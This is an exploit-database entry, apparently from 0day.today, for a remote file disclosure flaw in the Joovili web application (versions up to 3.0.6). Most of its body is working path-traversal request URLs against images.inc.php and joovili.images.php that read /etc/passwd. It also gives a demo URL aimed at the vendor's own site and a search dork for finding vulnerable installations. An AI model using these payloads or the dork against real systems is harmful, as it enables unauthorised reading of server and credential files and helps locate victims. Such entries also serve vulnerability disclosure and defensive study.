Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability

2007-12-27T00:00:00
ID 1337DAY-ID-2413
Type zdt
Reporter EcHoLL
Modified 2007-12-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================================
Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
==========================================================================



found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili



#  0day.today [2018-01-17]  #